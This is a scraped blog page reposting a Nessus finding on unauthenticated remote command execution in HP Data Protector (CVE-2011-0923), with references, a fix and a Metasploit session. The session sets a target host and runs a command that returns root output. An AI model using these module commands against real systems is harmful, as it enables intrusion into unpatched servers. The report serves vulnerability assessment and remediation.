metasploit - HP Data Protector Remote Command Execution
来源:互联网 发布:淘宝元素运动是正品吗 编辑:程序博客网 时间:2024/05/21 19:22
53641 (1) - HP Data Protector Remote CommandExecution
Synopsis
The remoteservice allows remote execution of arbitrary commands withoutauthentication.
Description
The remote HPData Protector client or server service is affected by a commandexecution vulnerability. A malicious user can send a speciallycrafted packet that causes this service to execute an arbitrary shellcommand with system privileges.
See Also
http://www.zerodayinitiative.com/advisories/ZDI-11-055/
http://archives.neohapsis.com/archives/bugtraq/2011-02/0076.html
http://www.nessus.org/u?6ca03389
Solution
1. Upgrade toData Protector A.06.20 or later and
2. Enable encryptedcontrol communication services on cell server and all clients incell.
Risk Factor
Critical
CVSS Base Score
10.0(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
References
BID
46234
CVE
CVE-2011-0923
XREF
OSVDB:72526
XREF
EDB-ID:17339
XREF
EDB-ID:17648
XREF
EDB-ID:18521
XREF
EDB-ID:27400
Exploitable with
CANVAS(true)Metasploit (true)
Plugin Information:
Publicationdate: 2011/05/03, Modification date: 2013/08/08
Hosts
192.168.1.92 (tcp/5555)
Nessus was able to exploit the vulnerability to execute thecommand
'/usr/bin/id' on the remote host, which produced thefollowing output :
------------------------------ snip------------------------------
sdp2
uid=0(root) gid=0(root)egid=3(sys)groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2
0
------------------------------snip ------------------------------
Attack Details
Module options (auxiliary/admin/hp/hp_data_protector_cmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD Windows\System32\calc.exe yes File to execute
RHOST yes The target address
RPORT 5555 yes The target port
msf auxiliary(hp_data_protector_cmd) > set CMD /usr/bin/id
CMD => /usr/bin/id
msf auxiliary(hp_data_protector_cmd) > set RHOST 192.168.1.92
RHOST => 192.168.1.92
msf auxiliary(hp_data_protector_cmd) > run
[*] 192.168.1.92:5555 - Sending command...
[*] �15 [12:1] ^B[2004] 1409833427 INET sdp2 uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2^F6 0
[*] Auxiliary module execution completed
- metasploit - HP Data Protector Remote Command Execution
- Gitorious Remote Command Execution
- Anfibia Remote Command Execution
- Exim sender_address Remote Command Execution
- TWiki SEARCH Variable Remote Command Execution Vulnerability
- xterm DECRQSS Remote Command Execution Vulnerability
- gitWeb v1.5.2 Remote Command Execution
- op5 Appliance Multiple Remote Command Execution Vulnerabilities
- RECEME - Remote Command Execution through eMail Exchange
- ZABBIX 'node_process_command()' Remote Command Execution Vulnerability
- Webmin /file/show.cgi Remote Command Execution
- Webmin /file/show.cgi Remote Command Execution
- SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution
- SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution
- ZPanel 10.0.0.2 Remote Command Execution
- Apache Mina 2.0.13 - Remote Command Execution
- ecshop 2.6.2 Multiple Remote Command Execution Vulnerabilities
- Cacti 'Linux - Get Memory Usage' Remote Command Execution Vulnerability
- C++线程池原理及创建(转)
- 智能硬件为什么火—离不开互联网思维
- 兰亭集序
- SQL Server 2008定时数据库同步(发布、订阅)
- 单例模式
- metasploit - HP Data Protector Remote Command Execution
- nyoj24素数距离问题
- PHP5中PDO的简单使用
- 优化eclipse启动
- 命令模式
- 中兴研究所
- Sorting array elements by date
- 供参考的 php 学习路线
- 更新Mac OS X自带的SVN和XCODE的SVN